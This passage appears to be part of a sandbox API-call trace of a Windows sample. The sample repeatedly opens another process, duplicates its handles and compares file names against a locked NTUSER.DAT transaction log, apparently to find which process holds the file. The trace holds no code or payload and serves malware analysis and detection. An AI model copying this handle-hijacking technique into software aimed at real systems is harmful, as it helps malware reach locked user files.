dwMilliseconds=0xfa) returned 0x0 [0153.629] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.629] CloseHandle (hObject=0x670) returned 1 [0153.629] CloseHandle (hObject=0x680) returned 1 [0153.629] CloseHandle (hObject=0x62c) returned 1 [0153.629] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.629] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.629] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.631] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.632] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.632] CloseHandle (hObject=0x670) returned 1 [0153.632] CloseHandle (hObject=0x680) returned 1 [0153.632] CloseHandle (hObject=0x62c) returned 1 [0153.632] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.632] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.633] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.633] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.634] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.634] CloseHandle (hObject=0x670) returned 1 [0153.634] CloseHandle (hObject=0x680) returned 1 [0153.634] CloseHandle (hObject=0x62c) returned 1 [0153.634] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.634] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.634] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.635] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.635] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.635] CloseHandle (hObject=0x670) returned 1 [0153.635] _wcsicmp (_Str1="\\Microsoft-Windows-ReadyBoost%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.635] CloseHandle (hObject=0x680) returned 1 [0153.635] CloseHandle (hObject=0x62c) returned 1 [0153.635] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.635] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.635] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.636] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.637] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.637] CloseHandle (hObject=0x670) returned 1 [0153.637] _wcsicmp (_Str1="\\Microsoft-Windows-GroupPolicy%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.637] CloseHandle (hObject=0x680) returned 1 [0153.637] CloseHandle (hObject=0x62c) returned 1 [0153.637] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.637] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.637] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.638] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.639] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.639] CloseHandle (hObject=0x670) returned 1 [0153.639] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.639] CloseHandle (hObject=0x680) returned 1 [0153.639] CloseHandle (hObject=0x62c) returned 1 [0153.639] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.639] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.639] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.640] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.640] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.641] CloseHandle (hObject=0x670) returned 1 [0153.641] _wcsicmp (_Str1="\\Microsoft-Windows-OfflineFiles%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.641] CloseHandle (hObject=0x680) returned 1 [0153.641] CloseHandle (hObject=0x62c) returned 1 [0153.641] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.641] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.641] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.642] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.642] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.642] CloseHandle (hObject=0x670) returned 1 [0153.642] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.642] CloseHandle (hObject=0x680) returned 1 [0153.642] CloseHandle (hObject=0x62c) returned 1 [0153.642] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.642] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.643] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.644] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.644] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.644] CloseHandle (hObject=0x670) returned 1 [0153.644] _wcsicmp (_Str1="\\Microsoft-Windows-Winlogon%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.644] CloseHandle (hObject=0x680) returned 1 [0153.644] CloseHandle (hObject=0x62c) returned 1 [0153.645] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.645] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.645] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.645] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.647] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.647] CloseHandle (hObject=0x670) returned 1 [0153.647] _wcsicmp (_Str1="\\Microsoft-Windows-User Profile Service%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.647] CloseHandle (hObject=0x680) returned 1 [0153.647] CloseHandle (hObject=0x62c) returned 1 [0153.647] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.647] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.647] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.648] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.648] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.648] CloseHandle (hObject=0x670) returned 1 [0153.648] _wcsicmp (_Str1="\\Microsoft-Windows-BranchCacheSMB%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.648] CloseHandle (hObject=0x680) returned 1 [0153.649] CloseHandle (hObject=0x62c) returned 1 [0153.649] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.649] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.649] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.649] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.650] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.650] CloseHandle (hObject=0x670) returned 1 [0153.650] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.650] CloseHandle (hObject=0x680) returned 1 [0153.650] CloseHandle (hObject=0x62c) returned 1 [0153.650] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.650] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.650] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.651] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.652] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.652] CloseHandle (hObject=0x670) returned 1 [0153.652] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.652] CloseHandle (hObject=0x680) returned 1 [0153.652] CloseHandle (hObject=0x62c) returned 1 [0153.652] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.652] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.653] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.654] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.654] CloseHandle (hObject=0x670) returned 1 [0153.654] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.654] CloseHandle (hObject=0x680) returned 1 [0153.654] CloseHandle (hObject=0x62c) returned 1 [0153.655] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.655] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.655] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.656] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.656] CloseHandle (hObject=0x670) returned 1 [0153.656] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.656] CloseHandle (hObject=0x680) returned 1 [0153.656] CloseHandle (hObject=0x62c) returned 1 [0153.656] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.656] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.657] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.658] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.658] CloseHandle (hObject=0x670) returned 1 [0153.658] _wcsicmp (_Str1="\\Microsoft-Windows-NCSI%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.658] CloseHandle (hObject=0x680) returned 1 [0153.658] CloseHandle (hObject=0x62c) returned 1 [0153.658] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.658] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.658] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.659] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.660] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.660] CloseHandle (hObject=0x670) returned 1 [0153.660] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.660] CloseHandle (hObject=0x680) returned 1 [0153.660] CloseHandle (hObject=0x62c) returned 1 [0153.660] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.660] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.660] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.661] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.662] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.662] CloseHandle (hObject=0x670) returned 1 [0153.662] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.662] CloseHandle (hObject=0x680) returned 1 [0153.662] CloseHandle (hObject=0x62c) returned 1 [0153.662] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.662] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.663] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.663] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.663] CloseHandle (hObject=0x670) returned 1 [0153.663] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.663] CloseHandle (hObject=0x680) returned 1 [0153.663] CloseHandle (hObject=0x62c) returned 1 [0153.663] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.663] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.664] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.665] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.665] CloseHandle (hObject=0x670) returned 1 [0153.665] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Problem-Steps-Recorder.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.665] CloseHandle (hObject=0x680) returned 1 [0153.665] CloseHandle (hObject=0x62c) returned 1 [0153.665] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.665] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.666] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.666] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.667] CloseHandle (hObject=0x670) returned 1 [0153.667] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.667] CloseHandle (hObject=0x680) returned 1 [0153.667] CloseHandle (hObject=0x62c) returned 1 [0153.667] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.667] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.667] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.668] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.668] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.668] CloseHandle (hObject=0x670) returned 1 [0153.668] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.668] CloseHandle (hObject=0x680) returned 1 [0153.668] CloseHandle (hObject=0x62c) returned 1 [0153.668] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.669] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.669] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.669] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.670] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.670] CloseHandle (hObject=0x670) returned 1 [0153.670] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.670] CloseHandle (hObject=0x680) returned 1 [0153.671] CloseHandle (hObject=0x62c) returned 1 [0153.671] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.671] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.671] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.671] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.672] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.672] CloseHandle (hObject=0x670) returned 1 [0153.672] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkProfile%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.672] CloseHandle (hObject=0x680) returned 1 [0153.672] CloseHandle (hObject=0x62c) returned 1 [0153.672] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.672] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.672] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.673] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.673] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.673] CloseHandle (hObject=0x670) returned 1 [0153.673] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0153.673] CloseHandle (hObject=0x680) returned 1 [0153.673] CloseHandle (hObject=0x62c) returned 1 [0153.674] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0153.674] 